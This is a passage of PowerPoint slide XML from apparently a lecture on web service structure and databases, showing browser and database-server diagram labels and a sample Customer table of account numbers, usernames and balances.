              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3706814" y="3520442"/>
            <a:ext cx="2075814" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>using custom</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-90" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6019800" y="4953000"/>
            <a:ext cx="2362200" cy="1676400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5"/>
          </a:solidFill>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="4445" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="35"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="3550">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="835660" marR="650875" indent="-177165">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Database  server</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1093740" y="1703340"/>
            <a:ext cx="2260600" cy="1733550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1752600"/>
            <a:ext cx="2108199" cy="1581149"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2514600" y="2514600"/>
            <a:ext cx="703580" cy="685800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="703580" h="685800">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="703262" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="703262" y="685799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="685799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1136650" y="1746250"/>
            <a:ext cx="2120900" cy="1593850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="2540" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="20"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="3400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1089025">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Title 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C46FC880-8D54-614F-801C-BA9E485C774C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Structure of Web Service</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FB6CFB-08F3-AB4B-A300-3583E7049D8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D386878D-D5FA-1549-B609-790007668035}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Structured collection of data           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>often storing tuples/rows of related values;                                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="251E06"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>organized in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="251E06"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="251E06"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>tables;</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11C8BB8F-7E85-6A40-ADDB-3011D0327B5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2448330681"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="938213" y="3744566"/>
          <a:ext cx="5538787" cy="3026468"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1533683">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2103337">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1901767">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="478509">
                <a:tc gridSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="27940" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="185"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" i="0" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Customer</a:t>
                      </a:r>
                      <a:endParaRPr sz="2600" i="0" dirty="0">
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>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000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="478509">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="99695" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="660"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>AcctNum</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="21618" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="99695" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="660"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Username</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="21618" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="99695" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="660"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>B</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>alance</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="21618" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="574912">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="99695" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="660"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>1199</a:t>
                      </a:r>
                      <a:endParaRPr sz="2600" kern="1200">
                        <a:solidFill>
                          <a:srgbClr val="40458C"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="77122" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="99695" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="660"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>zuckerberg</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="77122" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="99695" marR="63500" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="660"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>35.7</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="77122" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="560306">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="99695" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="660"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>0501</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="70111" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="99695" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="660"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>bgates</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="70111" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="99695" marR="63500" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="660"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>79.2</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="70111" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
